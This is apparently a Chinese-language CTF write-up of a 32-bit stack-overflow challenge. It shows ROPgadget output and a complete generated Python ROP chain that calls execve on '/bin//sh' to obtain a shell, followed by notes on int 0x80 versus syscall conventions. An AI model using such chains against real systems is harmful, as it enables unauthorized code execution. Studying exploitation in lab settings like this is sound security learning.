总之先从题目开始看吧,是一道非常简单但却让我长见识的题......

int overflow()
{
  char v1[12]; // [esp+Ch] [ebp-Ch] BYREF

  return gets(v1);
}

        明显的栈溢出,且程序基本没有特别的保护,正常构造rop链即可拿到shell

        主要是想拓展一下系统调用与一个简单的获取ROP方法

ROPgadget --binary rop --ropchain

ROP chain generation
===========================================================

- Step 1 -- Write-what-where gadgets

	[+] Gadget found: 0x8050cc5 mov dword ptr [esi], edi ; pop ebx ; pop esi ; pop edi ; ret
	[+] Gadget found: 0x8048433 pop esi ; ret
	[+] Gadget found: 0x8048480 pop edi ; ret
	[-] Can't find the 'xor edi, edi' gadget. Try with another 'mov [r], r'

	[+] Gadget found: 0x805466b mov dword ptr [edx], eax ; ret
	[+] Gadget found: 0x806ecda pop edx ; ret
	[+] Gadget found: 0x80b8016 pop eax ; ret
	[+] Gadget found: 0x80492d3 xor eax, eax ; ret

- Step 2 -- Init syscall number gadgets

	[+] Gadget found: 0x80492d3 xor eax, eax ; ret
	[+] Gadget found: 0x807a66f inc eax ; ret

- Step 3 -- Init syscall arguments gadgets

	[+] Gadget found: 0x80481c9 pop ebx ; ret
	[+] Gadget found: 0x80de769 pop ecx ; ret
	[+] Gadget found: 0x806ecda pop edx ; ret

- Step 4 -- Syscall gadget

	[+] Gadget found: 0x806c943 int 0x80

- Step 5 -- Build the ROP chain

	#!/usr/bin/env python2
	# execve generated by ROPgadget

	from struct import pack

	# Padding goes here
	p = ''

	p += pack('<I', 0x0806ecda) # pop edx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080b8016) # pop eax ; ret
	p += '/bin'
	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806ecda) # pop edx ; ret
	p += pack('<I', 0x080ea064) # @ .data + 4
	p += pack('<I', 0x080b8016) # pop eax ; ret
	p += '//sh'
	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806ecda) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x080492d3) # xor eax, eax ; ret
	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x080481c9) # pop ebx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080de769) # pop ecx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x0806ecda) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x080492d3) # xor eax, eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0806c943) # int 0x80

         ‘--ropchain’参数能够直接生成一条rop链来get shell

        其具体的构造方式不必细究,实际上笔者在写rop的时候也肯定不会这样写,不过结论来说,只需要加上合适的偏移就能在本题中直接拿到shell,倒是非常方便

      后日谈:这种生成方式相当机械,部分gadget稍有缺失就会导致生成失败,因此实际环境中可能并不好用,况且PIE开启时,就可能完全派不上用场了

然后是本篇的正文:

        在阅读了其生成的ROP链之后,笔者好奇地搜了一下是否有“syscall”指令,因为上述是通过“int 0x80”来陷入内核的,那为什么不用syscall呢?

        参考本贴:https://www.cnblogs.com/Max-hhg/articles/14266574.html

        两者的差异只有传参规则、指令与调用号不同而已

        32位:EBX、ECX、EDX、ESI、EDI、EBP

        64位:RDI、RSI、RDX、R10、R8、R9

        而在32位系统中使用 “int 0x80”,而64位系统中使用“syscall”,仅此而已的差别

后话:

        本来有点好奇,“为什么32位程序里会出现syscall指令”,后来对着IDA找汇编指令才发现,ROPgadget识别到的syscall在IDA里连对应的地址都找不到。

        实际上就是把原本的指令字节分割一下,然后单独取出能被当作syscall的字节

        嘛......这么来看还怪没有意义的...... ​

插画IDA:92121278

"The unexamined life is not worth living."